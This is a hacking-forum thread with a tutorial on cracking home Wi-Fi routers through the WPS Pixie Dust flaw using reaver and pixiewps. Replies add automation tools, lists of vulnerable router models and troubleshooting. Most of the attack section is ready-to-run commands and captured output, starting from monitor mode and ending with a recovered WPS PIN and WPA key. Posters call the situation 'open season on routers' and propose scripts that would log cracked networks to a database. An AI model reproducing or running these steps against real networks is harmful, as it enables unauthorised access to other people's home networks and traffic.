Using pixiewps on vulnerable chipset routers

[iTpHo3NiX]

Title: Using pixiewps on vulnerable chipset routers
Author: DeepCopy
Website: EvilZone.ORG

Disclaimer:
I do not advocate hacking of wireless networks that are not your own. This is for information purposes only. The following guide is an attack on a default Comcast setup that has WPS enabled by default with a secure WPA2 passphrase that a neighbor allowed me to attempt to break into.

Copy/Pasting:
You are welcome to copy and paste this tutorial, however I would appreciate a link to this OP leaving my name and source website intact along with my credits

Credits:
Evilzone - For existing, thanks ande and staff
FurqanHanif - For linking to the original information, getting me looking at the pixiedust exploit
Dominique Bongard - For discovering the vulnerability
reaver - The developers of reaver and also the guy that modified it for use with pixiewps
wiire - For creating pixiewps
soxrok2212 - For his youtube vid - https://www.youtube.com/watch?v=8f6oClT7Wp4

Please note this is just my walkthrough of following the steps as in the video. I prefer text tutorials to video tutorials, however if you prefer video tutorials just watch soxrok2212's video on the pixiewps attach.

Updating Reaver and Installing PixieWPS:

Kali has now included the modified reaver and pixiewps to their repos so it just got much easier to set up and install

Code: [Select]

apt-get update
apt-get install reaver
apt-get install pixiewps
Finding WPS enabled routers

So in a live attack, you're not going to know what routers are vulnerable, what routers have wps enabled, etc. That's ok

Let's set up our monitor mode interface

Code: [Select]

airmon-ng start wlan0
To find WPS enabled routers we are going to use the wash command

Code: [Select]

wash -i mon0 -CPress ctrl+c to stop the wash command

Now we get to see WPS enabled routers. Now I know that the newer comcast routers have a default setup of HOME-#### and these are running on a Ralink chipset Arrias router. These are nice and simple. So in this example I am going to be targeting a HOME-#### router.

Running reaver to collect data

Ok so now we need to collect the data to use pixiewps. So I chose my target:
ESSID: HOME-2128
BSSID: C4:39:3A:4B:21:28
Channel: 1

Lets get out info:

Code: [Select]

reaver -i mon0 -c 1 -b C4:39:3A:4B:21:28 -vv -S
We run reaver for a complete transaction and stop it pressing ctrl+c

After running this is what we get:

Code: [Select]

Reaver v1.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching mon0 to channel 1
[+] Waiting for beacon from C4:39:3A:4B:21:28
[+] Associated with C4:39:3A:4B:21:28 (ESSID: HOME-2128)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 68:94:9d:e8:c5:22:db:e0:b3:af:5d:6e:0b:3e:4e:80
[P] PKE: 83:ab:bf:00:56:2a:fc:d5:f9:ca:60:d0:e1:c4:11:e3:fe:97:0e:b3:9d:37:48:82:31:15:db:ea:0f:64:86:6a:e1:12:35:12:6f:c3:57:3d:5f:d6:5f:31:83:12:62:b4:ac:06:e7:c1:2c:3f:66:ac:54:2e:3a:54:44:66:ca:e2:65:b5:71:d9:c7:d5:67:2b:50:9e:6e:db:8b:39:31:bb:51:d7:9f:fc:39:52:57:2d:69:16:c0:40:06:0f:e0:84:e6:bb:e7:df:86:b4:7a:7c:68:f0:70:ff:37:01:1b:b5:98:be:ee:48:a8:08:26:7c:75:2f:25:2f:60:9a:87:f5:33:f1:e5:50:20:45:7d:6c:ef:fd:c1:3e:b1:00:7d:24:55:82:e6:29:78:3b:d6:03:2f:cd:e2:0a:b3:9d:0f:d4:c0:62:50:16:24:fe:ca:19:c7:3e:0a:52:64:06:bf:10:c7:0e:e3:4a:b4:17:45:3b:8d:47:de:4e:ce:8f:4f:5c
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Number: RT2860
[+] Received M1 message
[P] AuthKey: a0:22:62:16:a8:0c:36:bd:aa:40:4a:c5:96:af:1a:c8:3d:4e:89:ba:be:b5:4b:ba:fe:36:9d:99:46:0f:c4:3e
[+] Sending M2 message
[P] E-Hash1: de:20:e2:b2:74:98:00:6b:9f:8b:12:fc:9e:fb:d5:5c:81:0c:e1:00:22:60:2e:70:02:0d:8d:b5:45:be:3f:24
[P] E-Hash2: 42:30:50:cb:1f:67:f0:70:f5:0e:a0:8e:71:bb:4a:0d:d4:c6:03:f9:9f:47:1c:05:82:52:64:20:c4:03:3d:5b
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 1

So now if you are not receiving the ehash's you need to be closer to the access point. Simply get off your ass and move lmfao

Now im not even going to bother looking this up on wikidevi because it simply says Ralink, we're good. However if you're unsure look up the model and manufacturer on wikidevi or with google including wikidevi to get the page.

Now that we've received this message, we are ready to get the pin, yea, you heard we're already done, the rest is just plugging in the correct values

Using pixiewps to get the Pin

Code: [Select]

Usage: pixiewps <arguments>

 Required Arguments:

    -e, --pke      : Enrollee public key
    -r, --pkr      : Registrar public key
    -s, --e-hash1  : E-Hash1
    -z, --e-hash2  : E-Hash2
    -a, --authkey  : Key used in HMAC SHA-256

 Optional Arguments:

    -n, --e-nonce  : Enrollee nonce
    -S, --dh-small : Small Diffie-Hellman keys (--pkr not needed)

So its easy from here, just copy the data over:

Code: [Select]

pixiewps -e PKE -s EHASH1 -z EHASH2 -a AUTHKEY -S
On broadcomm chipsets, include the -n argument and the e-nonce to get the pin.

So with the following access point we punch in the values, our code looks like so:

Code: [Select]

pixiewps -e 83:ab:bf:00:56:2a:fc:d5:f9:ca:60:d0:e1:c4:11:e3:fe:97:0e:b3:9d:37:48:82:31:15:db:ea:0f:64:86:6a:e1:12:35:12:6f:c3:57:3d:5f:d6:5f:31:83:12:62:b4:ac:06:e7:c1:2c:3f:66:ac:54:2e:3a:54:44:66:ca:e2:65:b5:71:d9:c7:d5:67:2b:50:9e:6e:db:8b:39:31:bb:51:d7:9f:fc:39:52:57:2d:69:16:c0:40:06:0f:e0:84:e6:bb:e7:df:86:b4:7a:7c:68:f0:70:ff:37:01:1b:b5:98:be:ee:48:a8:08:26:7c:75:2f:25:2f:60:9a:87:f5:33:f1:e5:50:20:45:7d:6c:ef:fd:c1:3e:b1:00:7d:24:55:82:e6:29:78:3b:d6:03:2f:cd:e2:0a:b3:9d:0f:d4:c0:62:50:16:24:fe:ca:19:c7:3e:0a:52:64:06:bf:10:c7:0e:e3:4a:b4:17:45:3b:8d:47:de:4e:ce:8f:4f:5c -s de:20:e2:b2:74:98:00:6b:9f:8b:12:fc:9e:fb:d5:5c:81:0c:e1:00:22:60:2e:70:02:0d:8d:b5:45:be:3f:24 -z 42:30:50:cb:1f:67:f0:70:f5:0e:a0:8e:71:bb:4a:0d:d4:c6:03:f9:9f:47:1c:05:82:52:64:20:c4:03:3d:5b -a a0:22:62:16:a8:0c:36:bd:aa:40:4a:c5:96:af:1a:c8:3d:4e:89:ba:be:b5:4b:ba:fe:36:9d:99:46:0f:c4:3e -S

press enter and this is our output:

Code: [Select]

[*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
 [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
 [*] PSK1: 10:c4:31:46:20:a9:40:fb:c0:2b:e0:c5:13:94:9b:50
 [*] PSK2: 87:6d:5d:f8:cb:08:22:3b:f8:73:80:85:c1:5d:95:ee
 [+] WPS pin: 49236880

 [*] Time taken: 0 s
If it says that WPS Pin not found, this is a non vulnerable router

Now we use reaver to get the key:

Code: [Select]

reaver -i mon0 -c 1 -b C4:39:3A:4B:21:28 -vv -S --pin=49236880
Congradulations. You just cracked a router in under 3 minutes.

Please post any routers and chipsets you've tried so we can work on compiling a list of working and non-working chipsets.

[v32itas]

You definately deserve a cookie. Currently i have no time to try dis pixie dust attack, but it was nice to look in to this.

[iTpHo3NiX]

You definately deserve a cookie. Currently i have no time to try dis pixie dust attack, but it was nice to look in to this.

Yeah I was a little skeptical, but damn this is easy... shits all over the WEP attack. Literally takes no time at all. Going to have to break out the MiTM attacks, this is just too easy I almost feel sad...

[Evox]

Nicely written & very cool.

Haven't done any wifi cracking in a long while so its cool to see this.

Thanks for the share!

[iTpHo3NiX]

I kinda felt the same way. Seems like roughly about 50-60% of the APs around here are vulnerable to this. Add in WEP and those who have phone numbers for their passwords set by the service providers and its literally open season on routers

There has been a python script released which automates the process and makes it even easier:

https://github.com/nxxxu/AutoPixieWps
 

True story. Reminds me of airoscript.

Looking at this line:

Code: [Select]

call(["reaver", "-i", interface, "-c", channel, "-b", bssid, "-vv", "-S", WPSpin])
I think

Code: [Select]

"--pin=",WPSpin needs to be added.

[v32itas]

found this
https://docs.google.com/spreadsheets/d/1tSlbqVQ59kGn8hgmwcPTHUECQ3o9YhXR91A_p7Nnj5Y/edit?pli=1#gid=2048815923

on
https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)

gonna add my own findings soon(maybe)

[iTpHo3NiX]

found this
https://docs.google.com/spreadsheets/d/1tSlbqVQ59kGn8hgmwcPTHUECQ3o9YhXR91A_p7Nnj5Y/edit?pli=1#gid=2048815923

on
https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)

gonna add my own findings soon(maybe)

I can't update.. the netgear r6300 v1 is on the list wanted to add the v2 also is not exploitable (broadcomm chipset)
https://wikidevi.com/wiki/Netgear_R6300_v2

[0E 800]

@deepcopy - I modified with "--pin=" but still shows same info.

Would like for it to append info to a database and really automate.

Script is more of a copy-paste helper tool.

BTW - my tests so far:

 
Confirmed working on Belkin F7D5301 v2.

Not working on Linksys E2500 v2.

[iTpHo3NiX]

@deepcopy - I modified with "--pin=" but still shows same info.

Would like for it to append info to a database and really automate.

Script is more of a copy-paste helper tool.

BTW - my tests so far:

 
Confirmed working on Belkin F7D5301 v2.

Not working on Linksys E2500 v2.

Maybe we need to develop an evilzone script to automate and have it send info to a database that can be viewed. Should be fairly simple to do in bash. I haven't written a bash script in a while, could be a fun easy project.

[iTpHo3NiX]

So instead for the setup do

apt-get update
apt-get install reaver
apt-get install pixiewps

updated OP, no longer need to compile reaver and pixiewps

just tested against my router
ASUS RT-AC68R is not vulnerable. I still don't use WPS anyways though

Not Vulnerable:
Netgear R7000 - Broadcom BCM4709A0

Linksys WRT160Nv2 - Vulnerable (Ralink RT2880 - https://wikidevi.com/wiki/Linksys_WRT160N_v2 )

[t6_x]

Hello


I made a modification to reaver for him to do the pixiedust when testing a pin number


Here's my contribution


GitHub


https://github.com/t6x/reaver-wps-fork-t6x




Example

Code: [Select]

Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>


[+] Switching mon0 to channel 1
[?] Restore previous session for A.:9.:D.:....:....:...? [n/Y] n
[+] Waiting for beacon from A.:9.:D.:....:....:...
[+] Associated with A.:9.:D.:....:....:.... (ESSID: ......)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: c6:66:a6:72:37:6d:........
[P] PKE: 10:cf:cc:88:99:4b:15:de:a6:b3:26:fe:93:24:........
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Number: RT2860
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:........
[P] AuthKey: bf:68:34:b5:ce:e2:a1:24:dc:15:01:1c:78:9e:74:.......
[+] Sending M2 message
[P] E-Hash1: 2e:d5:17:16:36:b8:c2:bb:d1:14:7c:18:cf:89:58:b8:1d:9d:39:......
[P] E-Hash2: 94:fb:41:53:55:b3:8e:1c:fe:2b:a3:9b:b5:82:11:......
[Pixie-Dust]
[Pixie-Dust]   [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]   [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]   [*] PSK1: dd:09:bd:24:..........
[Pixie-Dust]   [*] PSK2: 77:e0:dd:00:........
[Pixie-Dust]   [+] WPS pin: 9178....
[Pixie-Dust]
[Pixie-Dust]   [*] Time taken: 0 s
[Pixie-Dust]
Running the reaver with the correct pin wait ...


[Reaver Test] BSSID: A.:9.:D.:3.:..:..
[Reaver Test] Channel: 1
[Reaver Test] [+] WPS PIN: '9178....'
[Reaver Test] [+] WPA PSK: '112233'
[Reaver Test] [+] AP SSID: '....'



Any problem or suggestion please contact me

[iTpHo3NiX]

Hello
I made a modification to reaver for him to do the pixiedust when testing a pin number
Here's my contribution

GitHub
https://github.com/t6x/reaver-wps-fork-t6x

Example

Code: [Select]

Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>

[+] Switching mon0 to channel 1
[?] Restore previous session for A.:9.:D.:....:....:...? [n/Y] n
[+] Waiting for beacon from A.:9.:D.:....:....:...
[+] Associated with A.:9.:D.:....:....:.... (ESSID: ......)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: c6:66:a6:72:37:6d:........
[P] PKE: 10:cf:cc:88:99:4b:15:de:a6:b3:26:fe:93:24:........
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Number: RT2860
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:........
[P] AuthKey: bf:68:34:b5:ce:e2:a1:24:dc:15:01:1c:78:9e:74:.......
[+] Sending M2 message
[P] E-Hash1: 2e:d5:17:16:36:b8:c2:bb:d1:14:7c:18:cf:89:58:b8:1d:9d:39:......
[P] E-Hash2: 94:fb:41:53:55:b3:8e:1c:fe:2b:a3:9b:b5:82:11:......
[Pixie-Dust]
[Pixie-Dust]   [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]   [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]   [*] PSK1: dd:09:bd:24:..........
[Pixie-Dust]   [*] PSK2: 77:e0:dd:00:........
[Pixie-Dust]   [+] WPS pin: 9178....
[Pixie-Dust]
[Pixie-Dust]   [*] Time taken: 0 s
[Pixie-Dust]
Running the reaver with the correct pin wait ...

[Reaver Test] BSSID: A.:9.:D.:3.:..:..
[Reaver Test] Channel: 1
[Reaver Test] [+] WPS PIN: '9178....'
[Reaver Test] [+] WPA PSK: '112233'
[Reaver Test] [+] AP SSID: '....'
Any problem or suggestion please contact me

Looks good, saw your modified reaver on Kali forums, thanks for the share!

[ptales]

Hey guys,


somehow I seem to be having problems with the monitor mode. After running airmon-ng start wlan0, it says monitor mode was enabled. When running wash -i mon0 -C, however, it says:

Code: [Select]

[X] ERROR: Failed to open 'mon0' for capturing
Trying to run reaver (with my router's MAC address) produces this:

Code: [Select]

[+] Switching mon0 to channel 1
[-] Failed to initialize interface 'mon0'
[-] Failed to recover WPA key
[+] Nothing done, nothing to save.So it's obvious that something isn't right with my monitor mode, I just can't figure out what it is. I've been trying this for the past few days but always get the same error. When running ifconfig (after enabling monitor mode), I cannot find anything named "mon0". When running iwconfig, though, I get this:

Code: [Select]

mon0      IEEE 802.11abgn  ESSID:off/any 
          Mode:Managed  Access Point: Not-Associated   Tx-Power=15 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
Hope my post isn't too dumb, as you can see, I'm quite new to this. If any other information is required to help me, please let me know.


Kind regards
ptales

[0E 800]

Review:
https://www.kali.org/penetration-testing/pixiewps-reaver-aircrack-ng-updates/

Most likely the name of your monitor interface is NOT mon0.

Code: [Select]

airmon-ng start wlan0
airmon-ng
 (look for your monitor interface name, verify if its mon0)

[ptales]

My monitor interface's name is mon0, I checked that, of course. When running airmon-ng start wlan0, it says "(monitor mode enabled on mon0)". When running "airmon-ng", it says

Code: [Select]

Interface Chipset Driver


mon0 Unknown iwlwifi - [phy0]
wlan0 Unknown iwlwifi - [phy0]This does mean "mon0" is correct, doesn't it? Thanks for your reply!